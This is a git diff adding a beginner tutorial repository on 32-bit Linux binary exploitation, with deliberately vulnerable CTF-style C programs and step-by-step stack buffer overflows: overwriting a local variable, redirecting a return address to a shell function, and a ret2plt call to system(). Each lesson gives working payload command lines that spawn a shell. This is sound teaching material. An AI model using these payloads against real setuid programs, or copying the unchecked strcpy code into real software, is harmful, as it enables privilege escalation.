diff --git a/README.md b/README.md index cedb6f6..e3b2f05 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,26 @@ -# how2exploit_binary -An in depth tutorial on how to do binary exploitation +### A note from the creator +Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been +looking for a place to start learning binary exploitation, then you're in luck. +Written by someone who is just barely better than "incompetent," I'll be +explaining how I learned my skills. These tutorials will be a bit long winded, +but hopefully they will be informative and entertaining. Please feel free to +contact me about any clarifications that should be included in the tutorials. + +**This is intended for linux. It's free if you don't already have it. Don't +want to dual boot? Get a VM.** + +-Best of luck + +bert88sta + +#how2exploit_binary: get your hack on. + +##Introductory Tutorials: + +* [Intro 1: What is a binary, really?](intro-1) +* [Intro 2: Screwing around with the stack](intro-2) + +##Buffer Overflows: + +* [1: The power of SEGFAULT](overflow-1) +* [2: Build your own `system()`](overflow-2) diff --git a/intro-1/README.md b/intro-1/README.md new file mode 100644 index 0000000..0bb35b7 --- /dev/null +++ b/intro-1/README.md @@ -0,0 +1,83 @@ +#Intro 1: What is a binary, really? + +In short, a binary is what happens when you take high level code such as C or +C++, and compile it into something the computer can actually run. I believe in +hands on learning, so we can take a look inside one to really find out. + +Consider the file [hello_world.c](hello_world.c): +```C +#include +int main() { + printf("Hello World!\n"); +} +``` + +This is your average C file, more or less. It's got a main, some includes, and +a little bit of code to be run. However, your computer can't actually run it. +In order to make it usable, we can run: +``` +$ gcc -m32 hello_world.c -o hello_world.bin +``` +You can ignore the `-m32` argument (you'll learn about it later), but the +`-o hello_world.bin` simply specifies what the name of the output file is. + +From here, we can execute it: +``` +$ ./hello_world.bin +Hello World! +``` +Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper. +We can open gdb (GNU Debugger) and see what's happening under the hood: +``` +$ gdb -q ./hello_world.bin +Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. +gdb-peda$ disas main +Dump of assembler code for function main: + 0x0804841d <+0>: push %ebp + 0x0804841e <+1>: mov %esp,%ebp + 0x08048420 <+3>: and $0xfffffff0,%esp + 0x08048423 <+6>: sub $0x10,%esp + 0x08048426 <+9>: movl $0x80484d0,(%esp) + 0x0804842d <+16>: call 0x80482f0 + 0x08048432 <+21>: leave + 0x08048433 <+22>: ret +End of assembler dump. +gdb-peda$ quit +``` +Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. +Don't worry about this, my gdb is modified. + +The weird stuff that gdb showed us is called assembly language. It's +essentially the lowest level human readable code out there. Each line of that +code maps one to one with a machine instruction. Let me break this down for +you. + +``` +0x0804841d <+0>: push %ebp +0x0804841e <+1>: mov %esp,%ebp +0x08048420 <+3>: and $0xfffffff0,%esp +0x08048423 <+6>: sub $0x10,%esp +``` +First, the numbers you see on the right are addresses. Just like your house +address, `0x0804841d` is where the instruction ` push %ebp` lives. These +first four instructions are just conventions for a function, in this case +`main()`. + +``` +0x08048426 <+9>: movl $0x80484d0,(%esp) +0x0804842d <+16>: call 0x80482f0 +``` + +These instructions are what actually prints out our "Hello World!". The program +moves the address of the string "Hello World!" into the memory that `%esp` +points to. `%esp` is a register. It holds four bytes of information for quick +access, usually some address. Our program then calls `puts()`, which prints out +whatever is at the address we supplied. +``` +0x08048432 <+21>: leave +0x08048433 <+22>: ret +``` + +Finally, these last two just pass control from our `main()` back to the C +library, which does some cleaning up and then exits. We'll be learning more +about how these binaries function in later tutorials. diff --git a/intro-1/hello_world.bin b/intro-1/hello_world.bin new file mode 100755 index 0000000..a46ce9e Binary files /dev/null and b/intro-1/hello_world.bin differ diff --git a/intro-1/hello_world.c b/intro-1/hello_world.c new file mode 100644 index 0000000..1d159d3 --- /dev/null +++ b/intro-1/hello_world.c @@ -0,0 +1,5 @@ +#include + +int main() { + printf("Hello World!\n"); +} diff --git a/intro-2/README.md b/intro-2/README.md new file mode 100644 index 0000000..6e18907 --- /dev/null +++ b/intro-2/README.md @@ -0,0 +1,163 @@ +#Intro 2: Screwing aroung with the stack. + +**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used +here.** + +Now that you've gotten your feet wet with binaries, it's time to dive in +headfirst. Consider the file [overflow1.c]() +```C +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char *str) { + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void **) buf, 23, (void **) &tmp); + printf("win = %d\n", win); + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + exit(0); +} + +int main(int argc, char **argv) { + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} +``` +You can tell just by reading through it that the obvious objective here is to +make `win==1` a true statement, but we're going to ignore that for a few +minutes to learn about the stack. The stack is dynamic memory that the program +uses to store addresses, arguments, and all sorts of other goodies. For +example: +``` +$ ./overflow1-3948d17028101c40 +Usage: stack_overwrite [str] +$ ./overflow1-3948d17028101c40 AAAA +Stack dump: +0xffd48bf4: 0xffd4a89b (second argument) +0xffd48bf0: 0x00000000 (first argument) +0xffd48bec: 0x0804870f (saved eip) +0xffd48be8: 0xffd48c18 (saved ebp) +0xffd48be4: 0xf7720000 +0xffd48be0: 0xf762caa7 +0xffd48bdc: 0x00000000 +0xffd48bd8: 0xffd48c44 +0xffd48bd4: 0xf7744500 +0xffd48bd0: 0xffd48c18 +0xffd48bcc: 0x00000000 +0xffd48bc8: 0x00000000 +0xffd48bc4: 0xf7720000 +0xffd48bc0: 0xffffffff +0xffd48bbc: 0xf760b216 +0xffd48bb8: 0x000000c2 +0xffd48bb4: 0xf757f698 +0xffd48bb0: 0xf7751938 +0xffd48bac: 0xf762cad4 +0xffd48ba8: 0x000003e8 +0xffd48ba4: 0x000003e8 +0xffd48ba0: 0xffd48c00 +0xffd48b9c: 0x41414141 (beginning of buffer) +win = 0 +Sorry, you lose. +``` +Now if you know a thing or two about ASCII, you'll know that 0x41 is the value +of "A". At the bottom of the stack dump, you'll notice that the beginning of +the buffer contains 0x41414141, or our four A's. Now we can run it again, only +this time we'll put a few more. Pay attention to the addresses on the left :) +``` +/overflow1-3948d17028101c40 $(python -c 'print "A"*76') +Stack dump: +0xfff577d4: 0xfff58853 (second argument) +0xfff577d0: 0x00000000 (first argument) +0xfff577cc: 0x0804870f (saved eip) +0xfff577c8: 0xfff57700 (saved ebp) +0xfff577c4: 0x41414141 +0xfff577c0: 0x41414141 +0xfff577bc: 0x41414141 +0xfff577b8: 0x41414141 +0xfff577b4: 0x41414141 +0xfff577b0: 0x41414141 +0xfff577ac: 0x41414141 +0xfff577a8: 0x41414141 +0xfff577a4: 0x41414141 +0xfff577a0: 0x41414141 +0xfff5779c: 0x41414141 +0xfff57798: 0x41414141 +0xfff57794: 0x41414141 +0xfff57790: 0x41414141 +0xfff5778c: 0x41414141 +0xfff57788: 0x41414141 +0xfff57784: 0x41414141 +0xfff57780: 0x41414141 +0xfff5777c: 0x41414141 (beginning of buffer) +win = 1094795585 +Sorry, you lose. +``` +This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s. +Now you'll notice that the addresses on the left are completely different than +the first run. This is normal. Most binaries these days have ASLR enabled, a +protection that randomizes stack addresses from run to run. However, you might +notice that `win = 1094795585` according to the stack dump. What just happened? + +Back to the source: +```C +char buf[64]; +strcpy(buf, str); +``` +Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function. +The buffer we provide contains 76 bytes. `strcpy()` doesn't care about checking +lengths. Instead, those extra 12 bytes that don't fit just get thrown onto the +stack. The value of `win` was stored right next to our buffer, so let's try to +set `win=1.` This is where things get a bit tricky. "1", as in the string, is +0x30. We need to submit 0x1, which isn't printable. Since `win` is right next +to our buffer on the stack, we can just submit 64 "A"s, followed by one "\x01" +to leak into the last byte of `win`. +``` +$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') +Stack dump: +0xffe29f04: 0xffe2b85e (second argument) +0xffe29f00: 0x00000000 (first argument) +0xffe29efc: 0x0804870f (saved eip) +0xffe29ef8: 0xffe29f28 (saved ebp) +0xffe29ef4: 0xf7760000 +0xffe29ef0: 0xf766caa7 +0xffe29eec: 0x00000001 +0xffe29ee8: 0x41414141 +0xffe29ee4: 0x41414141 +0xffe29ee0: 0x41414141 +0xffe29edc: 0x41414141 +0xffe29ed8: 0x41414141 +0xffe29ed4: 0x41414141 +0xffe29ed0: 0x41414141 +0xffe29ecc: 0x41414141 +0xffe29ec8: 0x41414141 +0xffe29ec4: 0x41414141 +0xffe29ec0: 0x41414141 +0xffe29ebc: 0x41414141 +0xffe29eb8: 0x41414141 +0xffe29eb4: 0x41414141 +0xffe29eb0: 0x41414141 +0xffe29eac: 0x41414141 (beginning of buffer) +win = 1 +$ ls +overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md +$ exit +``` + +If you try this for yourself, you'll get a shell. You sucessfully have +manipulated the stack to give you what you want. diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1-3948d17028101c40 new file mode 100755 index 0000000..61a465c Binary files /dev/null and b/intro-2/overflow1-3948d17028101c40 differ diff --git a/intro-2/overflow1-3948d17028101c40.c b/intro-2/overflow1-3948d17028101c40.c new file mode 100644 index 0000000..ca8013f --- /dev/null +++ b/intro-2/overflow1-3948d17028101c40.c @@ -0,0 +1,32 @@ +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char *str) { + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void **) buf, 23, (void **) &tmp); + printf("win = %d\n", win); + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + exit(0); +} + +int main(int argc, char **argv) { + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} diff --git a/overflow-1/README.md b/overflow-1/README.md new file mode 100644 index 0000000..9df4eed --- /dev/null +++ b/overflow-1/README.md @@ -0,0 +1,97 @@ +#The power of SEGFAULT + + +**Credit to [PicoCTF 2013](2013.picoctf.com) for problem** + +Consider our file for this exercise [overflow2.c](overflow2.c): +```C +#include +#include +#include + +/* This never gets called! */ +void give_shell(){ + gid_t gid = getegid(); + setresgid(gid, gid, gid); + system("/bin/sh -i"); +} + +void vuln(char *input){ + char buf[16]; + strcpy(buf, input); +} + +int main(int argc, char **argv){ + if (argc > 1) + vuln(argv[1]); + return 0; +} +``` + +Looking at the code for this program, you'll see they used `strcpy()` on our +argument. There are no size checks so we can easily try to overflow onto the +stack like before. You'll notice that there is no way `give_shell()` gets +called. Not yet at least ;) +``` +$ ./overflow2 $(python -c 'print "A"*24') +Segmentation fault (core dumped) +``` + +Segmentation fault? What's this? Simply put, a segmentation fault simply means +that the program tried to access an address that isn't there. Let's use +`strace` to see what's really happening. +``` +$ strace ./overflow2 $(python -c 'print "A"*32') +... +... +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- +``` +The address in question is 0x41414141, our four "A"s. What does this mean? +Consider the disassembly of the function `vuln()`, as well as `main()` where +it's called. +``` +$ gdb -q ./overflow2 +Reading symbols from ./overflow2...(no debugging symbols found)...done. +gdb-peda$ disas main +... + 0x08048516 <+26>: call 0x80484e2 + 0x0804851b <+31>: mov $0x0,%eax +... +gdb-peda$ disas vuln +Dump of assembler code for function vuln: + 0x080484e2 <+0>: push %ebp + 0x080484e3 <+1>: mov %esp,%ebp + 0x080484e5 <+3>: sub $0x28,%esp + 0x080484e8 <+6>: mov 0x8(%ebp),%eax + 0x080484eb <+9>: mov %eax,0x4(%esp) + 0x080484ef <+13>: lea -0x18(%ebp),%eax + 0x080484f2 <+16>: mov %eax,(%esp) + 0x080484f5 <+19>: call 0x8048360 + 0x080484fa <+24>: leave + 0x080484fb <+25>: ret +End of assembler dump. +``` +So you might remember from [Tntro 2](../intro-2) that you can overwrite values +on the stack with a `strcpy()` vulnerability. In the lines of `main()` , +control is passed to the function`vuln()`. However, `vuln()` needs to know where to +come back to in `main()` when it finishes. This is called a return address. In +this case, `vuln()` should jump back to 0x0804851b, the instruction right after +`main()` calls `vuln()`. When we get a SEGFAULT that we control, that means +that we've overwritten the return address. What can we do with this? The +possibilites are pretty much endless. You have control over the code's flow, +so maybe we can call some other function, namely `give_shell()` +``` +$ objdump -d overflow2 | grep give_shell +080484ad : +``` +Now that we have the address of a useful function, let's see if we can supply +*our own* return address. First, as you may remember from the last tutorial, +some of these characters aren't printable. We'll need to convert it to an +escape sequence and reverse the order, leaving us with this: "\xad\x84\x04\x08" +Now we can substitute it in! +``` +$ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') +$ ls +overflow2 overflow2.c README.md +``` +We now have a shell!' diff --git a/overflow-1/overflow2 b/overflow-1/overflow2 new file mode 100755 index 0000000..ef77335 Binary files /dev/null and b/overflow-1/overflow2 differ diff --git a/overflow-1/overflow2.c b/overflow-1/overflow2.c new file mode 100644 index 0000000..e660a7e --- /dev/null +++ b/overflow-1/overflow2.c @@ -0,0 +1,21 @@ +#include +#include +#include + +/* This never gets called! */ +void give_shell(){ + gid_t gid = getegid(); + setresgid(gid, gid, gid); + system("/bin/sh -i"); +} + +void vuln(char *input){ + char buf[16]; + strcpy(buf, input); +} + +int main(int argc, char **argv){ + if (argc > 1) + vuln(argv[1]); + return 0; +} diff --git a/overflow-2/README.md b/overflow-2/README.md new file mode 100644 index 0000000..114b3e4 --- /dev/null +++ b/overflow-2/README.md @@ -0,0 +1,106 @@ +#Build your own `system()` + +Well, life is tough. Unlike in the first overflow exercise, I've made this one +so that you can't just call a specific function and get a shell. However, we'll +try to solve it anyways. + +```C +#include +#include +#include + +int main(int argc, char **argv) { + if (argc>1) { + gid_t gid = getegid(); + setresgid(gid, gid, gid); + printf("Good thing you don't have /bin/sh"); + printf("\nGood luck getting a shell.\n"); + system("echo You Lose!\n"); + char buf[24]; + strcpy(buf,argv[1]); + } + return 0; +} +``` + +Now unlike the last problem, you might notice that there is no call to +`system("/bin/sh")`. This means we're going to have to be a bit more clever. + +Let's take a look at the disassembly to learn a bit more about `system()` +``` +$ gdb -q ./overflow +Reading symbols from ./overflow...(no debugging symbols found)...done. +gdb-peda$ disas main +Dump of assembler code for function main: +... + 0x0804853c <+47>: call 0x8048400 + 0x08048541 <+52>: movl $0x8048620,(%esp) + 0x08048548 <+59>: call 0x8048390 + 0x0804854d <+64>: movl $0x8048642,(%esp) + 0x08048554 <+71>: call 0x80483c0 + 0x08048559 <+76>: movl $0x804865e,(%esp) + 0x08048560 <+83>: call 0x80483d0 +``` +Now what is `system@plt`? This is a crucial part. This binary is dynamically +linked. This means that the binary makes calls to an actual libc file that gets +put into memory. Luckily for us, dynamically linked binaries have PLT stubs. +Since ASLR randomizes libc addresses as well, the binary needs some way to +reliably call the functions it uses. The PLT is a wrapper function for the +actual code in libc. **The PLT is a part of the binary, it's address doesn't +change.** If you call `system@plt`, you'll call `system()`. So how are we going +to do this? Since the PLT is a part of the binary, we'll use objump +``` +$ objdump -d overflow | grep system +080483d0 : + 8048560: e8 6b fe ff ff call 80483d0 +``` + +Now let's try to break the binary. +``` +$ strace ./overflow $(python -c 'print "A"*44') +... +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- +``` +We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer +register. This is the same as overwriting a return value. It simply means that +we have control over the control flow. Now let's supply our address. +``` +./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') +Good thing you don't have /bin/sh +Good luck getting a shell. +You Lose! +sh: 1: ������: not found +Segmentation fault (core dumped) +``` +Now this is really weird. What happened here is that we called `system()`. +We didn't provide any arguments for `system()` so it just pulled some junk from +the stack. Calling a function in an exploit has to take this form: + +\[address of function\] \[return address\] \[argument\] + +Now when the programmer wrote this, (I wrote this one :P) he thought he could +be smart and make fun of you for not having a "/bin/sh" string. However, he +didn't realize that by including that string in the code, the string is in the +binary. We can use gdb to find the string! + +``` +$ gdb -q ./overflow +Reading symbols from overflow...(no debugging symbols found)...done. +gdb-peda b*main +Breakpoint 1 at 0x804850d +gdb-peda$ r +Breakpoint 1, 0x0804850d in main () +gdb-peda$ find /bin/sh +Searching for '/bin/sh' in: None ranges +Found 3 results, display max 3 items: +overflow : 0x804863a ("/bin/sh") +overflow : 0x804963a ("/bin/sh") + libc : 0xf7f82a24 ("/bin/sh") +``` + +Now you'll notice that two of these are in the binary. I'll just pick the first +one and run with it. Finally, our finished exploit looks like so: +``` +./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + +"\x3a\x86\x04\x08"') +``` diff --git a/overflow-2/overflow b/overflow-2/overflow new file mode 100755 index 0000000..59825b7 Binary files /dev/null and b/overflow-2/overflow differ diff --git a/overflow-2/overflow.c b/overflow-2/overflow.c new file mode 100644 index 0000000..b827986 --- /dev/null +++ b/overflow-2/overflow.c @@ -0,0 +1,19 @@ +#include +#include +#include + +int main(int argc, char **argv) { + if (argc>1) { + gid_t gid = getegid(); + setresgid(gid, gid, gid); + printf("Good thing you don't have /bin/sh"); + printf("\nGood luck getting a shell.\n"); + system("echo You Lose!\n"); + char buf[24]; + strcpy(buf,argv[1]); + return 0; + } + else { + return 0; + } +}